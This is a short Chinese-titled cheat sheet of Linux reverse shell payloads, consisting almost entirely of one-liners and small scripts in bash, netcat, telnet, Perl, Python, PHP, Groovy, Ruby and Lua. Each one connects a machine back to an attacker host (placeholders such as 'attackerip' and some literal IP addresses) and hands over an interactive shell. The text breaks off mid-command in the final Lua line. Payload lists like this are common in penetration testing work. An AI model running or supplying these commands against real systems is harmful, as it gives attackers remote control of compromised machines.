linux反弹shell姿势

attacker$ nc -l -v attackerip 4444

/bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

1. exec 5<>/dev/tcp/attackerip/4444
2. cat <&5 | while read line; do $line 2>&5 >&5; done  # or:
while read line 0<&5; do $line 2>&5 >&5; done

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

#1.pl
use Socket;
$i="x.x.x.x";
$p=8080;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i))))
 {
 open(STDIN,">&S");
 open(STDOUT,">&S");
 open(STDERR,">&S");
 exec("/bin/sh -i");
 };

nc -e /bin/sh attackerip 4444

/bin/sh | nc attackerip 4444

如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

1. mknod /tmp/backpipe p
2. /bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe

#1.py
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("x.x.x.x",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

#2.py
#!/usr/bin/python
import socket,subprocess

HOST = '10.16.44.100' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
# recieve shell command
data = s.recv(1024)
# if its quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
# close socket
s.close()

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execut